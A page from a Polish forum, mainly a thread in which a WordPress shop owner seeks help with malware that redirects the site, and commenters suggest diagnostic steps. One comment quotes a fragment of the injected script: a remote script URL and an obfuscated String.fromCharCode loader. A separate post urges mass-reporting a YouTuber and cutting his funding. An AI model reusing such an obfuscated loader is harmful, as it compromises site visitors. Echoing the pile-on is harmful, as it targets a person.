Aktywne Wpisy

congobongo +40
Zgłaszajcie filmiki konfitury na YT za dokuczanie i nękanie (podpada pod 107kw).
Polecam też uciąć mu finansowanie czyli przez formularz kontaktowy patronite skontaktować się z nimi. Pierwsze maile już poszły.
Mam nadzieje, że spadnie z rowerka
#konfitura
Polecam też uciąć mu finansowanie czyli przez formularz kontaktowy patronite skontaktować się z nimi. Pierwsze maile już poszły.
Mam nadzieje, że spadnie z rowerka
#konfitura

SzubiDubiDu +167

#programowanie #sieci #hacking #wordpress
Mam sobie mały sklep internetowy i codziennie coś tam na nim sobie robie, to nowe produkty to coś innego.
Swierdziłem ze chce SSL, i kupiłem. To było 2 tygodnie temu i wszystko kryształ, działa.
Dizisja wchodze i strona jest przekierowywana na jakiś szit, sprawdzałem już wszystkie htaacces, nigdzie nie widać śladu przekierowania, sprawdzałem wszystkie wp-header'y, index.php i nigdzie nie widze czegoś co może być w jakimkolwiek stopniu powiązane z tymi przekierowywaniami.
Usunałem przez FTP wszystkie pluginy, lecz też bez zmian.
Domene mam na ovh - jeszcze mi nie odpisali
Hosting mam na linuxpl.com - odpisali, wrzucili mi backup. Ale bez zmian.
Nie wiem czy mam sie poddać czy co robić z tym już.
Strona: www.kajet.art
Obstawiam obfuskowany eval i inne świństwa gdzieś w plikach lub JS.
Po 1. zmień hasła bo jak się w-----i raz, to wjebią się kolejny.
Po 2. od nowa
Komentarz usunięty przez autora
2. zaraz to zrobie
3.nie wiem jak to zrobić
4.Sprawdziłem już, czysto
5. htaccess - czyste wszystkie które sprawdzałem
6. bo była promocja ( ͡° ͜ʖ ͡°)
@371t3: Miałem go zainstalowanego, jego pierwszego wyrzuciłem, ale nic nie pomogło
grep -iR szukanadomenana swoim kodzie i zobaczcie co i gdzie wam dołączyło skrypty z tej domeny. Oczywiście nie dam głowy, że nie ma tego w treści jakiegoś komentarza czy innego contentu od strony użytkownika. Wtedy szukajcie w bazie.Sprawdź też footer.php to też lubią używać.
źródło: comment_NUiTUyIukqBqTRiRQA6ncZJlt5fmUKPR.jpg
Pobierzhttps://mytemplatewebsite.com/0.js?/wp-content/themes/Divi/style_css&ver=3.17.6
var lt = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 121, 116, 101, 109, 112, 108, 97, 116, 101, 119, 101, 98, 115, 105, 116, 101, 46, 99, 111, 109, 47, 102, 46, 112, 104,
Komentarz usunięty przez autora